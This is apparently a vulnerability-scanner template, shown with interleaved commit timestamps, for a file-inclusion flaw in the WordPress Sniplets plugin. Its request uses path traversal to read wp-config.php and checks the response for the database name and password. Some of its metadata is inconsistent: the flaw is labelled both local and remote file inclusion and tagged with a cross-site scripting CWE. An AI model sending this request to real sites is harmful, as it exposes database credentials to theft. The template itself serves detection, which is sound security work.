2022-08-10 07:30:52 +00:00
id : CVE-2008-1059
2022-02-12 17:57:12 +00:00
info :
2022-07-29 14:04:23 +00:00
name : WordPress Sniplets 1.1.2 - Local File Inclusion
2022-02-12 17:57:12 +00:00
author : dhiyaneshDK
severity : high
2022-08-10 07:37:55 +00:00
description : |
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/5194
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
2022-08-10 07:30:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
2022-09-08 13:28:46 +00:00
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
2022-07-29 14:04:23 +00:00
classification :
2022-09-16 19:50:10 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cve-id : CVE-2008-1059
2022-09-16 20:03:07 +00:00
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-02-12 17:57:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-12 17:57:12 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
2022-02-15 12:03:40 +00:00
part : body
2022-02-12 17:57:12 +00:00
words :
- "DB_NAME"
- "DB_PASSWORD"
condition : and
- type : status
status :
- 200